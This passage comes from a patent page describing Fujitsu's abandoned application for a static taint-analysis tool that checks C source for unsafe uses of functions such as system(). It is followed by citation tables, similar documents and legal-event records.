- Since fgets function is used in 10th line, the vulnerability check apparatus determines that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
- Then, the vulnerability check apparatus determines that the value of the variable file_name has been checked by a function Check_file_name in 13th line and that the attaribute of the variable file_name is “checked”.
- Then, since snprintf function is used in 18th line, the vulnerability check apparatus determines that the attribute of variable file_name has been passed to variable Is_command and that the attribute of variable Is_command is “checked”.
- Then, since variable Is_command is used as an argument of system function in 19th line, the vulnerability check apparatus determines that system function processes a variable having a “checked” attribute, that is, determines that it is unlikely that vulnerability is generated.
- Although one alert message is output for one variable in the present embodiment, a plurality of alert messages for the same variable may be merged.
- There is often a case where a process in a program diverges due to appearance of if statement and different processing may be applied to the same variable in the branch locations. In this case, there may be a case where vulnerability that is likely to pose a serious risk is detected in one branch location and vulnerability rated low risk is detected in the other branch location. To separately output alert messages for both the cases is redundant for a user and, therefore, it is often preferable that the alert messages be merged. As an example of a method of merging the alert messages, there is one that uses an alert message of the highest severity and discards the other alert messages.
- Although vulnerability check is performed by processing the source code in the present embodiment, it may be performed by processing an intermediate language file. In the case of a program coded in C-language, the source code readable by humans is compiled and translated into a computer-executable machine language. A compiler generates an intermediate language file which is an intermediate file in the above translation process and can output the file onto a disk. The intermediate language file is one that represents the source code in the form of nodes unit by unit. The intermediate code is inferior in human readability than source code, but not more difficult in decoding than machine language.
FIG. 8 is a view showing an example of the intermediate language file. In the case where such intermediate language is read in, the vulnerability check apparatus generates a data flow in the form of a tree structure. Although data form is different, processing of vulnerability check can be performed in a manner similar to the case of source code. - Further, although the vulnerability check apparatus outputs an alert message so as to allow a user to correct a program according to the alert message in the present embodiment, a program correction method may be contained in the alert message, or a newly provided correction output section may automatically correct a program according to the correction method.
FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention. InFIG. 9 , the same reference numerals as those inFIG. 4 denote the same or corresponding parts as those inFIG. 4 , and the descriptions thereof will be omitted here. The apparatus shown inFIG. 9 differs from that ofFIG. 4 in the point that acorrection output section 51 is provided in place of thealert output section 41 so as to automatically correct a program. - In order to acquire a program correction method as described above, a program correction method for vulnerability may previously be defined in the determination rule. For example, one field is added to the determination rule concerning system function, and the type of the program correction method is described in the field as follows.
- system: alert_if param1=taint, correct=method3
- Further, the content of the program correction method3 is previously defined in the determination rule.
FIG. 10 is source code showing an example of the content of a program correction method according to the present invention. This program correction method3 inserts, immediately before using system function, logic for checking a string variable used as an argument of the system function. This logic checks whether a character, such as “|” or “;”, that may pose a danger if it is passed to shell is contained in the string variable. Invalid_String_Error(x) in FIG. 10 is a function defined in a different location and terminates a program by outputting an error. - Further, although the present embodiment is applied to C-language, it can be applied to another program language.
- Further, it is possible to provide a program that allows a computer constituting the vulnerability check apparatus to execute the above steps as a vulnerability check program. By storing the above program in a computer-readable storage medium, it is possible to allow the computer constituting the vulnerability check apparatus to execute the program. The computer-readable medium mentioned here includes: a portable storage medium such as a CD-ROM, a flexible disk, a DVD disk, a magneto-optical disk, or an IC card; a database that holds computer program; another computer and database thereof; and a transmission medium on a network line.
- According to the present invention, by detecting only the location at which a vulnerable library is not appropriately used, accuracy of vulnerability detection is significantly improved as compared to the conventional method that detects all vulnerable libraries.
Claims (16)
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
PCT/JP2005/002422 WO2006087780A1 (en) | 2005-02-17 | 2005-02-17 | Vulnerability examining program, vulnerability examining device, and vulnerability examining method |
Related Parent Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
PCT/JP2005/002422 Continuation WO2006087780A1 (en) | 2005-02-17 | 2005-02-17 | Vulnerability examining program, vulnerability examining device, and vulnerability examining method |
Publications (1)
Publication Number | Publication Date |
---|---|
US20070271617A1 true US20070271617A1 (en) | 2007-11-22 |
Family
ID=36916196
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
US11/832,779 Abandoned US20070271617A1 (en) | 2005-02-17 | 2007-08-02 | Vulnerability check program, vulnerability check apparatus, and vulnerability check method |
Country Status (3)
Country | Link |
---|---|
US (1) | US20070271617A1 (en) |
JP (1) | JPWO2006087780A1 (en) |
WO (1) | WO2006087780A1 (en) |
Cited By (16)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20060277604A1 (en) * | 2005-05-20 | 2006-12-07 | Microsoft Corporation | System and method for distinguishing safe and potentially unsafe data during runtime processing |
US20100131721A1 (en) * | 2008-11-21 | 2010-05-27 | Richard Title | Managing memory to support large-scale interprocedural static analysis for security problems |
US20110055813A1 (en) * | 2009-09-03 | 2011-03-03 | Inaternational Business Machines Corporation | Black Box Testing Optimization Using Information from White Box Testing |
US7958558B1 (en) * | 2006-05-18 | 2011-06-07 | Vmware, Inc. | Computational system including mechanisms for tracking propagation of information with aging |
US8561134B2 (en) * | 2004-09-03 | 2013-10-15 | Colorado Remediation Technologies, Llc | Policy-based selection of remediation |
US8819637B2 (en) | 2010-06-03 | 2014-08-26 | International Business Machines Corporation | Fixing security vulnerability in a source code |
CN104508672A (en) * | 2012-08-01 | 2015-04-08 | 三菱电机株式会社 | Program execution device and program analysis device |
CN104508677A (en) * | 2012-07-31 | 2015-04-08 | 惠普发展公司,有限责任合伙企业 | Conjoint vulnerability identifiers |
US20150207811A1 (en) * | 2012-07-31 | 2015-07-23 | Hewlett-Packard Development Company, L.P. | Vulnerability vector information analysis |
US20160110189A1 (en) * | 2014-10-16 | 2016-04-21 | International Business Machines Corporation | Parallel development of diverged source streams |
US20170169229A1 (en) * | 2015-12-10 | 2017-06-15 | Sap Se | Vulnerability analysis of software components |
CN106940772A (en) * | 2016-01-05 | 2017-07-11 | 阿里巴巴集团控股有限公司 | The tracking and device of variable object |
CN113010899A (en) * | 2021-04-16 | 2021-06-22 | 上海交通大学 | PHP deserialization vulnerability exploitation chain detection method |
JP7331679B2 (en) | 2018-12-21 | 2023-08-23 | 富士通株式会社 | Determining Information Leakage in Computer Readable Programs |
US11895138B1 (en) * | 2015-02-02 | 2024-02-06 | F5, Inc. | Methods for improving web scanner accuracy and devices thereof |
JP7433510B2 (en) | 2020-07-02 | 2024-02-19 | ミツビシ・エレクトリック・アールアンドディー・センター・ヨーロッパ・ビーヴィ | Methods, storage media, computer programs, and processing circuits for verifying implementation of security policies |
Families Citing this family (7)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
JP4693044B2 (en) * | 2005-08-18 | 2011-06-01 | 株式会社日立ソリューションズ | Source code vulnerability inspection device |
US7991902B2 (en) * | 2006-12-08 | 2011-08-02 | Microsoft Corporation | Reputation-based authorization decisions |
JP5176478B2 (en) * | 2007-10-22 | 2013-04-03 | 富士通株式会社 | Data flow analysis device, data flow analysis method, and data flow analysis program |
US8914890B2 (en) * | 2011-01-31 | 2014-12-16 | International Business Machines Corporation | Determining the vulnerability of computer software applications to privilege-escalation attacks |
JP7068752B2 (en) * | 2018-03-22 | 2022-05-17 | 三菱電機株式会社 | Source code analyzer and source code analysis program |
CN110399725A (en) * | 2019-06-18 | 2019-11-01 | 深圳壹账通智能科技有限公司 | Loophole processing method and processing device, electronic equipment and computer readable storage medium |
WO2020261430A1 (en) * | 2019-06-26 | 2020-12-30 | 三菱電機株式会社 | Information processing device, information processing method, and information processing program |
Citations (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20040260940A1 (en) * | 2003-04-18 | 2004-12-23 | Ounce Labs, Inc. | Method and system for detecting vulnerabilities in source code |
US20050097535A1 (en) * | 2003-09-15 | 2005-05-05 | Plum Thomas S. | Automated safe secure techniques for eliminating undefined behavior in computer software |
US6978441B2 (en) * | 2001-10-03 | 2005-12-20 | Sun Microsystems, Inc. | Rating apparatus and method for evaluating bugs |
US20060080578A1 (en) * | 2004-10-07 | 2006-04-13 | Microsoft Corporation | Defect detection for integers |
US7392545B1 (en) * | 2002-01-18 | 2008-06-24 | Cigital, Inc. | Systems and methods for detecting software security vulnerabilities |
-
2005
- 2005-02-17 JP JP2007503520A patent/JPWO2006087780A1/en active Pending
- 2005-02-17 WO PCT/JP2005/002422 patent/WO2006087780A1/en not_active Application Discontinuation
-
2007
- 2007-08-02 US US11/832,779 patent/US20070271617A1/en not_active Abandoned
Patent Citations (5)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US6978441B2 (en) * | 2001-10-03 | 2005-12-20 | Sun Microsystems, Inc. | Rating apparatus and method for evaluating bugs |
US7392545B1 (en) * | 2002-01-18 | 2008-06-24 | Cigital, Inc. | Systems and methods for detecting software security vulnerabilities |
US20040260940A1 (en) * | 2003-04-18 | 2004-12-23 | Ounce Labs, Inc. | Method and system for detecting vulnerabilities in source code |
US20050097535A1 (en) * | 2003-09-15 | 2005-05-05 | Plum Thomas S. | Automated safe secure techniques for eliminating undefined behavior in computer software |
US20060080578A1 (en) * | 2004-10-07 | 2006-04-13 | Microsoft Corporation | Defect detection for integers |
Non-Patent Citations (3)
Title |
---|
Bush, W. et al, "A Static Analyzer for Finding Dynamic Programming Errors," Software-Practice and Experience, 2000, vol. 30, Issue 7, pp 775-802. * |
Ganapathy, Vinod et al. "Buffer Overrun Detection using Linear Programming and Static Analysis," 2003, UW-Madison Comp. Sci. Tech. Report 1488. * |
George C. Necula and Peter Lee. "The Design and Implementation of a Certifying Compiler," In Keith D. Cooper, editor, Proceedings of the Conference on Programming Language Design and Implementation (PLDI'98), pages 333-344, MOntreal, Canada, June 1998. ACM Press. * |
Cited By (31)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US9602550B2 (en) | 2004-09-03 | 2017-03-21 | Fortinet, Inc. | Policy-based selection of remediation |
US9154523B2 (en) | 2004-09-03 | 2015-10-06 | Fortinet, Inc. | Policy-based selection of remediation |
US9392024B2 (en) | 2004-09-03 | 2016-07-12 | Fortinet, Inc. | Policy-based selection of remediation |
US8561134B2 (en) * | 2004-09-03 | 2013-10-15 | Colorado Remediation Technologies, Llc | Policy-based selection of remediation |
US20060277604A1 (en) * | 2005-05-20 | 2006-12-07 | Microsoft Corporation | System and method for distinguishing safe and potentially unsafe data during runtime processing |
US7757282B2 (en) * | 2005-05-20 | 2010-07-13 | Microsoft Corporation | System and method for distinguishing safe and potentially unsafe data during runtime processing |
US7958558B1 (en) * | 2006-05-18 | 2011-06-07 | Vmware, Inc. | Computational system including mechanisms for tracking propagation of information with aging |
US20100131721A1 (en) * | 2008-11-21 | 2010-05-27 | Richard Title | Managing memory to support large-scale interprocedural static analysis for security problems |
US8429633B2 (en) * | 2008-11-21 | 2013-04-23 | International Business Machines Corporation | Managing memory to support large-scale interprocedural static analysis for security problems |
US8387017B2 (en) * | 2009-09-03 | 2013-02-26 | International Business Machines Corporation | Black box testing optimization using information from white box testing |
US20110055813A1 (en) * | 2009-09-03 | 2011-03-03 | Inaternational Business Machines Corporation | Black Box Testing Optimization Using Information from White Box Testing |
US8819637B2 (en) | 2010-06-03 | 2014-08-26 | International Business Machines Corporation | Fixing security vulnerability in a source code |
US9298924B2 (en) | 2010-06-03 | 2016-03-29 | International Business Machines Corporation | Fixing security vulnerability in a source code |
CN104508677A (en) * | 2012-07-31 | 2015-04-08 | 惠普发展公司,有限责任合伙企业 | Conjoint vulnerability identifiers |
US20150207811A1 (en) * | 2012-07-31 | 2015-07-23 | Hewlett-Packard Development Company, L.P. | Vulnerability vector information analysis |
US20150213272A1 (en) * | 2012-07-31 | 2015-07-30 | Hewlett-Packard Developement Company, L.P. | Conjoint vulnerability identifiers |
CN104508672A (en) * | 2012-08-01 | 2015-04-08 | 三菱电机株式会社 | Program execution device and program analysis device |
US20150302191A1 (en) * | 2012-08-01 | 2015-10-22 | Mitsubishi Electric Corporation | Program execution apparatus and program analysis apparatus |
EP2881877A4 (en) * | 2012-08-01 | 2016-08-03 | Mitsubishi Electric Corp | Program execution device and program analysis device |
US9507933B2 (en) * | 2012-08-01 | 2016-11-29 | Mitsubishi Electric Corporation | Program execution apparatus and program analysis apparatus |
US20160110187A1 (en) * | 2014-10-16 | 2016-04-21 | International Business Machines Corporation | Parallel development of diverged source streams |
US10310848B2 (en) * | 2014-10-16 | 2019-06-04 | International Business Machines Corporation | Parallel development of diverged source streams |
US20160110189A1 (en) * | 2014-10-16 | 2016-04-21 | International Business Machines Corporation | Parallel development of diverged source streams |
US10169032B2 (en) * | 2014-10-16 | 2019-01-01 | International Business Machines Corporation | Parallel development of diverged source streams |
US11895138B1 (en) * | 2015-02-02 | 2024-02-06 | F5, Inc. | Methods for improving web scanner accuracy and devices thereof |
US20170169229A1 (en) * | 2015-12-10 | 2017-06-15 | Sap Se | Vulnerability analysis of software components |
US10691808B2 (en) * | 2015-12-10 | 2020-06-23 | Sap Se | Vulnerability analysis of software components |
CN106940772A (en) * | 2016-01-05 | 2017-07-11 | 阿里巴巴集团控股有限公司 | The tracking and device of variable object |
JP7331679B2 (en) | 2018-12-21 | 2023-08-23 | 富士通株式会社 | Determining Information Leakage in Computer Readable Programs |
JP7433510B2 (en) | 2020-07-02 | 2024-02-19 | ミツビシ・エレクトリック・アールアンドディー・センター・ヨーロッパ・ビーヴィ | Methods, storage media, computer programs, and processing circuits for verifying implementation of security policies |
CN113010899A (en) * | 2021-04-16 | 2021-06-22 | 上海交通大学 | PHP deserialization vulnerability exploitation chain detection method |
Also Published As
Publication number | Publication date |
---|---|
JPWO2006087780A1 (en) | 2008-07-03 |
WO2006087780A1 (en) | 2006-08-24 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US20070271617A1 (en) | Vulnerability check program, vulnerability check apparatus, and vulnerability check method | |
JP7164017B2 (en) | Systems and methods for optimizing control flow graphs for functional safety using fault tree analysis | |
Wassermann et al. | Sound and precise analysis of web applications for injection vulnerabilities | |
JP4902129B2 (en) | Method and system for enforcing a security policy via a security virtual machine | |
US8635602B2 (en) | Verification of information-flow downgraders | |
Doupe et al. | deDacota: toward preventing server-side XSS via automatic code and data separation | |
US8572747B2 (en) | Policy-driven detection and verification of methods such as sanitizers and validators | |
Backes et al. | R-droid: Leveraging android app analysis with static slice optimization | |
US20120216177A1 (en) | Generating Sound and Minimal Security Reports Based on Static Analysis of a Program | |
US11314863B2 (en) | Behavioral threat detection definition and compilation | |
US11663326B2 (en) | Behavioral threat detection definition and compilation | |
EP3495978A1 (en) | Method for detecting vulnerabilities in software | |
US20170185784A1 (en) | Point-wise protection of application using runtime agent | |
US20210004470A1 (en) | Automatic Generation Of Patches For Security Violations | |
JP5077455B2 (en) | Vulnerability audit program, vulnerability audit device, vulnerability audit method | |
Grabowski et al. | Type-based enforcement of secure programming guidelines—code injection prevention at SAP | |
CN115774865A (en) | Front-end code operation method and device, electronic equipment and storage medium | |
Zhioua et al. | Formal specification and verification of security guidelines | |
Le Guernic | Precise Dynamic Verification of Confidentiality. | |
Zhioua et al. | Framework for the formal specification and verification of security guidelines | |
CN111027073B (en) | Vulnerability detection method, device, equipment and storage medium | |
KR100562149B1 (en) | Method for detecting vulnerability buffer-overflow | |
CN116361748B (en) | Software supply chain safety detection method and device | |
KR102026959B1 (en) | Security system and operation method thereof | |
Hamlen et al. | Chekov: Aspect-oriented runtime monitor certification via model-checking (extended version) |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
AS | Assignment |
Owner name: FUJITSU LIMITED, JAPAN Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:TORII, SATORU;MITOMO, MASASHI;REEL/FRAME:019637/0619;SIGNING DATES FROM 20070704 TO 20070706 |
|
AS | Assignment |
Owner name: FUJITSU LIMITED, JAPAN Free format text: RECORD TO CORRECT THE ASSIGNEE'S ADDRESS. CORRECT ADDRESS IS 1-1, KAMIKODANAKA 4-CHOME NAKAHARA-KU KAWASAKI-SHI KANAGAWA 211-8588 JAPAN RECORDED ON 019637/0619;ASSIGNORS:MITOMO, MASASHI;TORII, SATORU;REEL/FRAME:020114/0689;SIGNING DATES FROM 20070704 TO 20070706 |
|
STCB | Information on status: application discontinuation |
Free format text: ABANDONED -- FAILURE TO RESPOND TO AN OFFICE ACTION |